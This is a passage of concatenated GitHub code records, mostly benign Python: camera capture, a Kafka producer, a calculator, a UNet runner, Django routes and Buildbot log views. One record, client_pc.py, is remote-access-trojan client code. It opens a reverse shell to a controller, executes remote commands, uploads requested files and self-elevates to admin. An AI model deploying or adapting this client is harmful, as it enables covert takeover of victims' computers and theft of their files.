cv2.VideoCapture(port)\n img = cap.read()[1]\n cap.release()\n except:\n return False\n return True\n\n def startloop(self):\n while True:\n if not self.mainq.empty():\n self.clientqs = self.mainq.get()\n\n img1 = self.capture.read()[1]\n img2 = self.capture.read()[1]\n img3 = self.capture.read()[1]\n for clientq in self.clientqs:\n if not clientq.empty():\n clientq.put(img1)\n clientq.put(img2)\n clientq.put(img3)","repo_name":"trevtb/desccunit","sub_path":"camhelper.py","file_name":"camhelper.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42093643767","text":"import time\nimport datetime\nfrom kafka import KafkaProducer\n\nproducer = KafkaProducer(bootstrap_servers = 'kafka:9092')\n\nwhile True:\n current_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n message = \"Current time is \" + str(current_time)\n producer.send('common', message.encode('utf-8'))\n print(f\"Message sent: {message}\")\n time.sleep(5)","repo_name":"pasha-str27/NUWM_Labs","sub_path":"Lab_05/service1/service1.py","file_name":"service1.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23822566681","text":"# client_pc.py\r\n\r\nimport socket\r\nimport subprocess\r\nimport time\r\nimport os\r\nimport shutil\r\nimport pyuac\r\n\r\n\r\ndef main():\r\n host = \"127.0.0.1\"\r\n port = 4886\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n def common():\r\n op = subprocess.Popen(data.decode(), shell=True,\r\n stdout=subprocess.PIPE,\r\n stderr=subprocess.PIPE,\r\n stdin=subprocess.PIPE, )\r\n\r\n report = op.stdout.read()\r\n report_error = op.stderr.read()\r\n\r\n print(report.decode())\r\n print(report_error.decode())\r\n\r\n s.sendall(report)\r\n s.sendall(report_error)\r\n\r\n while True:\r\n try:\r\n s.connect((host, port))\r\n print(\"Established connection to: \", str(host) + \":\" + str(port))\r\n break\r\n except Exception:\r\n print(\"Connection refused, retrying...\")\r\n time.sleep(2)\r\n\r\n while True:\r\n data = s.recv(4294967296)\r\n extracted = data.decode()\r\n print(\"Executed:\", extracted)\r\n\r\n if extracted[:2] == \"cd\":\r\n try:\r\n os.chdir(extracted[3:])\r\n s.sendall((\"Directory changed: \" + extracted).encode())\r\n except Exception:\r\n print(\"The system cannot find the path specified.\")\r\n s.sendall(\"The system cannot find the path specified.\".encode())\r\n\r\n elif extracted[:5] == \"mkdir\":\r\n try:\r\n os.mkdir(extracted[6:])\r\n s.sendall((\"Directory made: \" + extracted).encode())\r\n except Exception:\r\n print(\"A subdirectory or file \" + extracted[6:] + \" already exists.\")\r\n s.sendall(\"A subdirectory or file \" + extracted[6:] + \" already exists.\")\r\n\r\n elif extracted[:6] == \"deldir\":\r\n try:\r\n shutil.rmtree(extracted[7:])\r\n s.sendall((\"Directory deleted: \" + extracted).encode())\r\n except Exception:\r\n print(\"The system cannot find the subdirectory specified.\")\r\n s.sendall(\"The system cannot find the subdirectory specified.\")\r\n \r\n elif extracted[:8] == \"download\":\r\n try:\r\n f = open(extracted[9:], \"rb\")\r\n data = f.read()\r\n print(\"File uploaded.\")\r\n s.sendall(data)\r\n f.close()\r\n except:\r\n print(\"Unable to send data.\")\r\n s.sendall(\"Unable to send data.\".encode())\r\n\r\n else:\r\n common()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if not pyuac.isUserAdmin():\r\n pyuac.runAsAdmin()\r\n else:\r\n main()\r\n","repo_name":"WilliamAfton-codes/Python-RAT","sub_path":"client_pc.py","file_name":"client_pc.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20216944297","text":"#!/usr/bin/python3\n\n\nif __name__ == \"__main__\":\n from calculator_1 import add, div, sub, mul\n import sys\n\n def checkForOperator(op):\n ar = [\"+\", \"-\", \"/\", \"*\"]\n operation = [add, sub, div, mul]\n if (op in ar):\n for i in range(0, len(ar)):\n if (op == ar[i]):\n return operation[i]\n\n else:\n return 0\n\n args = sys.argv\n length = len(args)\n\n if (length - 1 != 3):\n print(\"Usage: ./100-my_calculator.py <a> <operator> <b>\")\n exit(1)\n else:\n operation = checkForOperator(args[2])\n if (operation == 0):\n print(\"Unknown operator. Available operators: +, -, * and /\")\n exit(1)\n else:\n ar1 = int(args[1])\n ar2 = int(args[3])\n print(\"{} {} {} = {}\".format(\n ar1, args[2], ar2, operation(ar1, ar2)))\n","repo_name":"salahbesbes/holbertonschool-higher_level_programming","sub_path":"0x02-python-import_modules/100-my_calculator.py","file_name":"100-my_calculator.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28407695887","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndf = pd.read_csv('C:\\\\Users\\\\DIOGO MOTA\\\\Desktop\\\\Codigo_Estagio\\\\DADOS\\\\Dados_Ze\\\\Mao_esquerda_ze\\\\ze_esquerda.csv')\r\n\r\ndf = pd.DataFrame(df, columns = ['frames', 'x', 'y', 'dr'])\r\ndf.drop([0])\r\n\r\nx = df['x'].tolist()\r\ny = df['y'].tolist()\r\n\r\ndef norm_pos(lista_x, lista_y):\r\n\r\n lista_norm_x = []\r\n lista_norm_y = []\r\n media_x = np.mean(lista_x)\r\n media_y = np.mean(lista_y)\r\n desvio_padrao_x = np.std(lista_x)\r\n desvio_padrao_y = np.std(lista_y)\r\n\r\n for i in range(len(lista_x)):\r\n\r\n x_novo = (lista_x[i] - media_x) / desvio_padrao_x\r\n y_novo = (lista_y[i] - media_y) / desvio_padrao_y\r\n lista_norm_x.append(x_novo)\r\n lista_norm_y.append(y_novo)\r\n\r\n\r\n\r\n return(lista_norm_x, lista_norm_y)\r\n\r\nnormalizacao = norm_pos(x,y)\r\n\r\nnorm_x = normalizacao[0]\r\nnorm_y = normalizacao[1]\r\n\r\ndados = {'x': norm_x, 'y': norm_y}\r\nbase = pd.DataFrame(dados)\r\n\r\nbase.to_csv('C:\\\\Users\\\\DIOGO MOTA\\\\Desktop\\\\Codigo_Estagio\\\\DADOS\\\\Dados_Ze\\\\Mao_esquerda_ze\\\\ze_esquerda_posicoes_norm.txt')\r\n","repo_name":"Dpm99/Video-Analysis-for-pattern-recognition","sub_path":"Normalize_positions.py","file_name":"Normalize_positions.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21063885508","text":"import logging\nimport os\nimport sys\nimport cv2\nimport time\nfrom datetime import datetime\nimport threading\n\n# Test periodical image capture with\n# RPi Camera Module v2, resolution 3280 x 2464 pixels\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\nclass CameraRPiv2(): # cap_w=3280, cap_h=2464\n capture_width = 3280\n capture_height = 2464\n fps = 21\n width = 3280 # // 2\n height = 2464 # // 2\n \n def __init__(self, *args, **kwargs):\n # super(CameraRPiv2, self).__init__(*args, **kwargs)\n # self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)\n try:\n self.cap = cv2.VideoCapture(self._gst_str(), cv2.CAP_GSTREAMER)\n re, image = self.cap.read()\n if not re:\n raise RuntimeError('Could not read image from camera.')\n self.value = image\n self.start()\n except:\n self.stop()\n raise RuntimeError('Could not initialize camera')\n # atexit.register(self.stop)\n\n def _gst_str(self):\n return 'nvarguscamerasrc ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink' % (\n self.capture_width, self.capture_height, self.fps, self.width, self.height)\n \n def _capture_frames(self):\n while True:\n re, image = self.cap.read()\n if re:\n self.value = image\n else:\n break\n\n def start(self):\n if not self.cap.isOpened():\n self.cap.open(self._gst_str(), cv2.CAP_GSTREAMER)\n if not hasattr(self, 'thread') or not self.thread.isAlive():\n self.thread = threading.Thread(target=self._capture_frames)\n self.thread.start()\n\n def stop(self):\n if hasattr(self, 'cap'):\n self.cap.release()\n if hasattr(self, 'thread'):\n self.thread.join()\n \n def restart(self):\n self.stop()\n self.start()\n\n\nif __name__ == \"__main__\":\n \n d_name = os.path.abspath(os.path.dirname(__file__))\n f_name = os.path.splitext(os.path.basename(__file__))[0]\n\n logging.basicConfig(\n level=logging.DEBUG, \n filename=os.path.join(d_name, f_name + \".log\"),\n filemode=\"w\",\n format=\"%(asctime)s: %(levelname)s: %(funcName)s Line:%(lineno)d %(message)s\",\n datefmt=\"%d/%m/%Y %H:%M:%S\")\n\n logging.info(\"Starting camera test\")\n\n secs = 0.5\n if len(sys.argv) == 2 and is_number(sys.argv[1]): # value.isdigit()\n secs = float(sys.argv[1])\n logging.info(\"Set period to {} second(s)\".format(secs))\n else:\n print(\"Test whether camera is periodically capturing images\")\n print(\"Usage: python3 \" + __file__ + \" nsec\")\n sys.exit()\n\n d_out = os.path.join(d_name, f_name)\n \n if not os.path.exists(d_out):\n logging.info(\"Make output directory {}\".format(d_out))\n os.makedirs(d_out)\n \n cam = CameraRPiv2()\n\n try:\n while True:\n # img_path = os.path.join(d_out_0, datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\") + '.jpg')\n # img_path = os.path.join(d_out, 'frame_'+ datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\") +'.jpg')\n img_path = os.path.join(d_out, datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\") +'.jpg')\n logging.info(\"Capture camera value and write to {}\".format(img_path))\n cv2.imwrite(img_path, cam.value)\n print(img_path)\n # <class 'numpy.ndarray'> (2464, 3280, 3)\n time.sleep(secs)\n except KeyboardInterrupt:\n logging.info(\"Keyboard interrupt\")\n cam.stop()","repo_name":"miroslavradojevic/python-snippets","sub_path":"jetbot/cam_rpiv2.py","file_name":"cam_rpiv2.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20195919436","text":"#!/usr/bin/env python3\n\nimport unittest\nimport varapp\nfrom varapp.apps import VarappConfig\nfrom django.db import connections\nimport django.test\n\nclass TestStartup(django.test.TestCase):\n \"\"\"What happens when the app starts\"\"\"\n def test_normal(self):\n conf = VarappConfig('varapp', varapp)\n return_code = conf.ready()\n self.assertEqual(return_code, 0)\n\n def test_no_tables_in_users_db(self):\n c = connections['default'].cursor()\n c.execute(\"PRAGMA writable_schema = 1\")\n c.execute(\"delete from sqlite_master where type='table'\")\n c.execute(\"PRAGMA writable_schema = 0\")\n conf = VarappConfig('varapp', varapp)\n return_code = conf.ready()\n self.assertEqual(return_code, 1)\n\n @unittest.skip('')\n def test_no_redis(self):\n pass\n","repo_name":"varapp/varapp-backend-py","sub_path":"tests/test_startup.py","file_name":"test_startup.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"1950254686","text":"# Write a program to check character is vowel or not.\n\nvowels = ['a', 'e', 'i', 'o', 'u']\n\na = input(\"Enter a character: \")\nb = a.lower() in vowels\nif b:\n print(\"Vowel\")\nelse:\n print(\"Not a vowel\")","repo_name":"basu021/lab","sub_path":"5th_sem/python/record-written/vowel.py","file_name":"vowel.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"35271080248","text":"import numpy as np\nfrom .env import Env\nfrom ..constants import Constants\n\n\nclass Fruits(Env):\n\n WRONG_PICK_REWARD = - 0.1\n STEP_REWARD = 0.0\n POSITIVE_REWARD = 1.0\n\n class Fruit:\n\n def __init__(self, index, position, env_size):\n # fruit has an index, a position and an indicator if it was picked (active)\n self.index = index\n self.position = position\n self.active = False\n\n self.x = self.position // env_size\n self.y = self.position % env_size\n\n def same_position(self, fruit):\n\n return self.position == fruit.position\n\n def __str__(self):\n\n s = \"Fruit {:d}: position ({:d},{:d})/{:d}, \".format(self.index, self.x, self.y, self.position)\n\n if self.active:\n s += \"active\"\n else:\n s += \"inactive\"\n\n return s\n\n def __init__(self, num_fruits=5, size=5, max_steps=30, no_start=True, no_wrong_pick=True):\n # no_start should be True\n # it's from an old version where the agent needed to execute action 0 in order to start picking\n super(Fruits, self).__init__()\n\n self.num_fruits = num_fruits\n self.size = size\n self.max_steps = max_steps\n self.no_start = no_start\n self.no_wrong_pick = no_wrong_pick\n\n self.goal = None\n self.fruits = []\n self.started = None\n self.current_step = None\n\n self.reset_goal()\n self.reset()\n\n def reset(self):\n # reset fruits\n self.fruits = []\n self.started = False\n self.current_step = 0\n\n if self.no_start:\n self.started = True\n\n for i in range(self.num_fruits):\n\n while True:\n\n fruit = self.create_fruit_(i)\n\n done = True\n for fruit2 in self.fruits:\n if fruit.same_position(fruit2):\n done = False\n\n if done:\n break\n\n self.fruits.append(fruit)\n\n return self.get_state()\n\n def reset_goal(self):\n # sample a random goal (a set of fruits to pick up)\n # self.goal is a list of indices of the goal fruits\n num_fruits = np.random.randint(1, self.num_fruits + 1)\n fruits = list(np.random.choice(list(range(self.num_fruits)), size=num_fruits, replace=False))\n\n self.goal = fruits\n\n def step(self, action):\n # execute a step in the env given an action\n num_actions = self.size ** 2\n assert 0 <= action < num_actions\n reached_goal = False\n done = False\n negative_reward = False\n\n if action == 0 and not self.no_start:\n # old version of the env had action 0 = start picking\n # now self.no_start should be always true\n self.started = True\n elif action == num_actions - 1:\n # action 24 (last action) is for saying that you are done picking\n reached_goal = self.check_goal_()\n else:\n # started should be always true\n if self.started:\n for fruit in self.fruits:\n if fruit.position == action:\n if self.no_wrong_pick:\n # no wrong pick means that the agent gets penalized for picking the wrong fruit\n # I use this in my paper\n if fruit.index in self.goal:\n fruit.active = True\n else:\n negative_reward = True\n else:\n fruit.active = not fruit.active\n\n self.current_step += 1\n\n if self.current_step >= self.max_steps or reached_goal:\n # we are done if we reached step limit or we picked up the right fruits and executed the end action\n done = True\n\n reward = self.STEP_REWARD\n\n if negative_reward:\n reward = self.WRONG_PICK_REWARD\n if reached_goal:\n reward = self.POSITIVE_REWARD\n\n return self.get_state(), reward, done, {Constants.REACHED_GOAL: reached_goal}\n\n def get_state(self):\n # get state as a tensor of HxWx|F|\n # H: height, W: width, |F|: number of fruits\n # the last dimension is used to one-hot encode fruits\n # zero everywhere means no fruit at that position\n image = np.zeros((self.size, self.size, self.num_fruits + 1), dtype=np.float32)\n\n if self.started and not self.no_start:\n # agent pressed the start flag\n image[0, 0, self.num_fruits] = 1.0\n\n for fruit in self.fruits:\n # mark the fruit location with 1\n image[fruit.x, fruit.y, fruit.index] = 1.0\n if fruit.active:\n # make if a fruit has been picked\n image[fruit.x, fruit.y, self.num_fruits] = 1.0\n\n return image\n\n def get_abstract_action(self, action):\n # used for debugging\n num_actions = self.size ** 2\n offset = 0\n\n if not self.started:\n if action == 0:\n return offset\n else:\n return offset + 1\n else:\n offset += 2\n if action == 0:\n return offset\n elif action == num_actions - 1:\n offset += 1\n if self.check_goal_():\n return offset\n else:\n return offset + 1\n else:\n offset += 3\n for fruit in self.fruits:\n if action == fruit.position:\n if fruit.active:\n if fruit.index in self.goal:\n return offset\n else:\n return offset + 1\n else:\n if fruit.index in self.goal:\n return offset + 2\n else:\n return offset + 3\n\n offset += 4\n return offset\n\n def get_abstract_action_name(self, abstract_action):\n # used for debugging\n names = [\n \"start\", \"start not active\", \"start already active\", \"finish\", \"not yet done\", \"deactivate goal fruit\",\n \"deactivate distractor fruit\", \"activate goal fruit\", \"activate distractor fruit\", \"do nothing\"\n ]\n\n return names[abstract_action]\n\n def check_goal_(self):\n # check if goal reached\n if not self.started:\n return False\n\n for fruit in self.fruits:\n if fruit.active and fruit.index not in self.goal:\n return False\n if not fruit.active and fruit.index in self.goal:\n return False\n\n return True\n\n def create_fruit_(self, index):\n # create a fruit at a random position\n # fruit index is also its position in self.fruits, bit redundant\n num_cells = self.size ** 2\n\n if self.no_start:\n start_idx = 0\n else:\n start_idx = 1\n\n position = int(np.random.randint(start_idx, num_cells - 1))\n\n return self.Fruit(index, position, self.size)\n\n def get_next_fruit_to_pick_(self):\n # hand-crafted optimal policy, used to generate expert demonstrations\n for fruit_idx in self.goal:\n\n fruit = self.fruits[fruit_idx]\n\n if not fruit.active:\n # goal fruit not picked\n return fruit_idx\n\n # already picked all fruits\n return None\n\n def get_optimal_action_(self):\n # hand-crafted optimal policy, used to generate expert demonstrations\n assert self.no_start\n\n if self.check_goal_():\n # \"end\" action\n return int(self.size ** 2) - 1\n else:\n next_fruit_idx = self.get_next_fruit_to_pick_()\n return self.fruits[next_fruit_idx].position\n\n @staticmethod\n def state_to_image(state):\n # turn state into an RGB image, doesn't show the fruit indices\n r = np.sum(state[:, :, :-1], axis=2)\n g = state[:, :, -1]\n b = np.zeros_like(g)\n\n return np.stack([r, g, b], axis=2)\n","repo_name":"ondrejbiza/action_priors","sub_path":"ap/envs/fruits.py","file_name":"fruits.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"24766046425","text":"import torch\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nimport cv2 as cv\nimport model\nimport pickle\n\nDATA_MAX_SIZE = 1000\n\nFILE = \"dataset/input\"\nmdl_file = \"model/UNet_mdl5.pickle\"\n\n# if torch.cuda.is_available():\n# device = torch.device(\"cuda:0\")\n# print(\"Running on GPU\")\n# else:\n# device = torch.device(\"cpu\")\n# print(\"Running on CPU\")\ndevice = torch.device(\"cpu\")\nfiles =[]\n\nif os.path.isdir(FILE):\n for fi in os.listdir(FILE):\n files.append(os.path.join(FILE, fi))\nelse:\n files.append(FILE)\n\n# net = model.UNet()\nfile = open(mdl_file, \"rb\")\nnet = pickle.load(file)\nfile.close()\nnet.to(device)\n\nfor f_img in files[DATA_MAX_SIZE:DATA_MAX_SIZE*2]:\n with torch.no_grad():\n img = cv.imread(f_img, cv.IMREAD_GRAYSCALE)\n cv.imshow(\"INPUT\", img)\n img = torch.Tensor([np.array((img))]).view(-1, 1, net.INPUT_SIZE, net.INPUT_SIZE)\n img = img / 255\n img = img.to(device)\n out = net(img)\n out = out.to('cpu')\n out = out.view(net.OUTPUT_SIZE, net.OUTPUT_SIZE).numpy()\n cv.imshow(\"OUTPUT\", out)\n cv.waitKey(500)\n","repo_name":"kamilmlodzikowski/UNet_filter","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6591303526","text":"import numpy as np\nimport qtpy\nimport time\nimport torch\nimport pandas as pd\nimport datashader as ds\nfrom collections import OrderedDict\n\nfrom scipy.interpolate import interp1d, griddata\nfrom layout_calculation import hexes2colors\nfrom openGLviz.net_visualizer import Visualizer\nfrom threading import Thread\nfrom vispy import app, gloo\nimport imageio\nfrom immersions.input_optimization.activation_utilities import ModelActivations, activation_selection_dict\nfrom scripts.create_networks import scalogram_resnet_network_smaller\n\nname = 'immersions_scalogram_resnet_house_smaller'\n\nactivation_shapes_path = 'C:/Users/HEV7RNG/Documents/Immersions/models/immersions_scalogram_resnet_house_smaller/immersions_scalogram_resnet_house_smaller_activation_shapes.p'\nactivations = ModelActivations(activation_shapes_path,\n ignore_time_dimension=True,\n remove_results=True)\n\nglobal current_layer\ncurrent_layer = 'no_layer'\n\ndef write_img():\n global current_layer\n img = gloo.read_pixels(alpha=False)\n imageio.imwrite(name + '_' + current_layer + '.png', img)\n\nviz = Visualizer(node_positions=np.random.rand(1, 0, 2).astype(np.float32),\n animate=False,\n edge_textures=np.zeros((1, 800, 800)).astype(np.float32),\n size=(1200, 1200),\n draw_callback=write_img)\nviz.min_node_radius = 0.002\nviz.node_radius_factor = 0.002\nviz.animate = False\nviz.node_alpha_factor = 2.\n#viz.edges_colors = hexes2colors(['#000000', '#3f34a0', '#334f9a', '#337294', '#338e8c'])\nviz.edges_colors = hexes2colors(['#000000', '#ffffff'])\nviz.node_colors = hexes2colors(['#ffffff'])\n\nwindow = qtpy.QtWidgets.QMainWindow()\nwindow.setFixedSize(1500, 1500)\nwindow.setCentralWidget(viz.native)\n\npositions = np.load(\n 'C:/Users/HEV7RNG/Documents/Immersions/models/immersions_scalogram_resnet_house_smaller/immersions_scalogram_resnet_house_smaller_layout_positions.npy')\nposition_min = positions.min()\nposition_max = positions.max()\npositions = (positions - position_min) / (position_max - position_min)\n\nnet = scalogram_resnet_network_smaller()\n\ncanvas = ds.Canvas(plot_width=800, plot_height=800,\n x_range=(0,1), y_range=(0,1),\n x_axis_type='linear', y_axis_type='linear')\n\nlayers = ['scalogram',\n 'scalogram_block_0_main_conv_1',\n 'scalogram_block_0_main_conv_2',\n 'scalogram_block_1_main_conv_1',\n 'scalogram_block_1_main_conv_2',\n 'scalogram_block_2_main_conv_1',\n 'scalogram_block_2_main_conv_2',\n 'scalogram_block_3_main_conv_1',\n 'scalogram_block_3_main_conv_2',\n 'scalogram_block_4_main_conv_1',\n 'scalogram_block_4_main_conv_2',\n 'scalogram_block_5_main_conv_1',\n 'scalogram_block_5_main_conv_2',\n 'scalogram_block_6_main_conv_1',\n 'scalogram_block_6_main_conv_2',\n 'scalogram_block_7_main_conv_1',\n 'scalogram_block_7_main_conv_2',\n 'ar_block_0',\n 'ar_block_1',\n 'ar_block_2',\n 'ar_block_3',\n 'ar_block_4',\n 'ar_block_5',\n 'ar_block_6',\n 'ar_block_7',\n 'ar_block_8',\n 'prediction']\n\ndef visualize_layers():\n global current_layer\n\n current_layer = 'connections'\n\n print(\"calc connections\")\n edges = torch.FloatTensor(net.num_connections*3, 3)\n edges[0::3, :2] = torch.from_numpy(positions[net.connections[:, 0], :])\n edges[1::3, :2] = torch.from_numpy(positions[net.connections[:, 1], :])\n edges[2::3, :] = float('nan')\n edges[0::3, 2] = 1. #current_weights[net.connections[:, 0]]\n edges[1::3, 2] = 1. #current_weights[net.connections[:, 1]]\n edges = pd.DataFrame(data=edges.numpy())\n edges.columns = ['x', 'y', 'val']\n edges_lines = canvas.line(edges, 'x', 'y', agg=ds.sum('val')).values.astype(np.float32)\n edges_lines[edges_lines != edges_lines] = 0.\n edges_lines = pow(edges_lines / edges_lines.max(), 0.25)\n viz.edge_textures = edges_lines[np.newaxis, :, :]\n viz.update()\n\n viz.edge_textures = edges_lines[np.newaxis, :, :] * 0.\n\n for layer in layers:\n time.sleep(1)\n current_layer = layer\n activation_selection_dict = {\n 'layer': current_layer,\n 'channel': 0.,\n 'channel_region': 1.,\n 'pitch': 0.,\n 'pitch_region': 1.,\n 'time': 0.,\n 'time_region': 1.,\n 'keep_selection': 0.\n }\n activations.select_activations(activation_selection_dict)\n\n layer_positions = positions[activations.focus]\n viz.set_new_node_positions(layer_positions[None, :])\n viz.update()\n\n\nviz_thread = Thread(target=visualize_layers, daemon=True)\nviz_thread.start()\n\n\nwindow.show()\napp.run()","repo_name":"vincentherrmann/pytorch-graph-visualization","sub_path":"scripts/visualize_focused_layers.py","file_name":"visualize_focused_layers.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70800115114","text":"from django.conf.urls import url, include\nfrom django.contrib.auth import views as auth_views\nfrom exegesis import views\n\nurlpatterns = [\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', auth_views.logout, name='logout'),\n url(r'^auth/', include('social_django.urls', namespace='social')),\n url(r'^projects/$', views.projects, name='projects'),\n url(r'^create_project/', views.create_project),\n url(r'^artboards/', views.artboards),\n url(r'^svg_images/', views.svg_images),\n url(r'^svg/', views.index),\n url(r'^update_artboard/', views.update_artboard),\n url(r'^delete_artboard/', views.delete_artboard),\n url(r'^rename_artboard/', views.rename_artboard),\n url(r'^delete_project/', views.delete_project),\n url(r'^share_project/', views.share_project),\n # url(r'^download_artboard/', views.download_artboard),\n url(r'^revisions/', views.revisions),\n url(r'^write_note/', views.write_note),\n]\n","repo_name":"gokulnathgm/annotator","sub_path":"exegesis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17243289177","text":"#!/usr/bin/env python3\n\"\"\"Utilities to read and write unicode code point to braille cell mappings.\"\"\"\n\nimport argparse\nimport json\n\n\ndef print_all_braille_unicode(file_out=\"braille_from_english-map.json\"):\n \"\"\"Print all 6-dot braille cells as a json object.\n\n Output:\n { \"10240\": \"­љЅђ\", ..., \"10303\": \"Ра┐\" }\n \"\"\"\n with open(file_out, \"w\", encoding=\"utf8\") as file:\n u_to_d = {f\"{i}\": chr(i) for i in range(0x2800, 0x2840)}\n x = json.dump(u_to_d, file, indent=2, ensure_ascii=False)\n\n\ndef convert_braille_dict_to_array(file_in=\"braille_from_english-map.json\",\n file_out=\"braille_from_english-array.json\"):\n \"\"\"Print a json array of objects mapping braille to english.\n\n Output:\n [ {\"braille\": \"РаЂ\", \"english\": \"a\"},\n {\"braille\": \"РаЃ\", \"english\": \"b\"},\n ...\n ]\n \"\"\"\n with open(file_in, \"r\", encoding=\"utf8\") as file:\n e_to_u = json.load(file)\n a = [{\"braille\": v, \"english\": k} for k, v in e_to_u.items()]\n with open(file_out, \"w\", encoding=\"utf8\") as file:\n x = json.dump(a, file, indent=2, ensure_ascii=False)\n\n\ndef reorder_braille_array(file_in=\"braille_from_english-array.json\",\n file_out=\"braille_map.json\"):\n \"\"\"Sort a json array braille-to-english objects by code poitnt.\n\n Output:\n [ {\"braille\": \"Рађ\", \"english\": \" \"},\n {\"braille\": \"РаЂ\", \"english\": \"a\"},\n {\"braille\": \"Раѓ\", \"english\": \"(ea)\"},\n ...\n ]\n \"\"\"\n with open(file_in, \"r\", encoding=\"utf8\") as file:\n cells = json.load(file)\n cells.sort(key=lambda x: x[\"braille\"])\n with open(file_out, \"w\", encoding=\"utf8\") as file:\n x = json.dump(cells, file, indent=2, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n # print_all_braille_unicode()\n # convert_braille_dict_to_array()\n reorder_braille_array()\n","repo_name":"mbdeaton/bref","sub_path":"support/brailler.py","file_name":"brailler.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15457947031","text":"from zope.interface import implements\nfrom twisted.python import components\nfrom twisted.spread import pb\nfrom twisted.web import server\nfrom twisted.web.resource import Resource\nfrom twisted.web.error import NoResource\n\nfrom buildbot import interfaces\nfrom buildbot.status import logfile\nfrom buildbot.status.web.base import IHTMLLog, HtmlResource, path_to_root\nfrom buildbot.util.ansicodes import parse_ansi_sgr\n\nclass ChunkConsumer:\n implements(interfaces.IStatusLogConsumer)\n\n def __init__(self, original, textlog):\n self.original = original\n self.textlog = textlog\n def registerProducer(self, producer, streaming):\n self.producer = producer\n self.original.registerProducer(producer, streaming)\n def unregisterProducer(self):\n self.original.unregisterProducer()\n def writeChunk(self, chunk):\n formatted = self.textlog.content([chunk])\n try:\n if isinstance(formatted, unicode):\n formatted = formatted.encode('utf-8')\n self.original.write(formatted)\n except pb.DeadReferenceError:\n self.producing.stopProducing()\n def finish(self):\n self.textlog.finished()\n\n# /builders/$builder/builds/$buildnum/steps/$stepname/logs/$logname\nclass TextLog(Resource):\n # a new instance of this Resource is created for each client who views\n # it, so we can afford to track the request in the Resource.\n implements(IHTMLLog)\n\n asText = False\n subscribed = False\n\n def __init__(self, original):\n Resource.__init__(self)\n self.original = original\n\n def getChild(self, path, req):\n if path == \"text\":\n self.asText = True\n return self\n return Resource.getChild(self, path, req)\n\n def content(self, entries):\n html_entries = []\n text_data = ''\n for type, entry in entries:\n if type >= len(logfile.ChunkTypes) or type < 0:\n # non-std channel, don't display\n continue\n\n is_header = type == logfile.HEADER\n\n if not self.asText:\n # jinja only works with unicode, or pure ascii, so assume utf-8 in logs\n if not isinstance(entry, unicode):\n entry = unicode(entry, 'utf-8', 'replace')\n first_entry = True\n _type = logfile.ChunkTypes[type]\n for ansi_entry in entry.split(\"\\033[\"):\n code = \"\"\n if not first_entry:\n\n ansi_entry, ansi_classes = parse_ansi_sgr(ansi_entry)\n if ansi_classes:\n code = \"\".join([\" ansi\" + i for i in ansi_classes])\n\n html_entries.append(dict(type=_type + code,\n text=ansi_entry,\n is_header=is_header))\n first_entry = False\n\n elif not is_header:\n text_data += entry\n\n if self.asText:\n return text_data\n else:\n return self.template.module.chunks(html_entries)\n\n def render_HEAD(self, req):\n self._setContentType(req)\n\n # vague approximation, ignores markup\n req.setHeader(\"content-length\", self.original.length)\n return ''\n\n def render_GET(self, req):\n self._setContentType(req)\n self.req = req\n\n if not self.asText:\n self.template = req.site.buildbot_service.templates.get_template(\"logs.html\") \n \n data = self.template.module.page_header(\n pageTitle = \"Log File contents\",\n texturl = req.childLink(\"text\"),\n path_to_root = path_to_root(req))\n data = data.encode('utf-8') \n req.write(data)\n\n self.original.subscribeConsumer(ChunkConsumer(req, self))\n return server.NOT_DONE_YET\n\n def _setContentType(self, req):\n if self.asText:\n req.setHeader(\"content-type\", \"text/plain; charset=utf-8\")\n else:\n req.setHeader(\"content-type\", \"text/html; charset=utf-8\")\n \n def finished(self):\n if not self.req:\n return\n try:\n if not self.asText:\n data = self.template.module.page_footer()\n data = data.encode('utf-8')\n self.req.write(data)\n self.req.finish()\n except 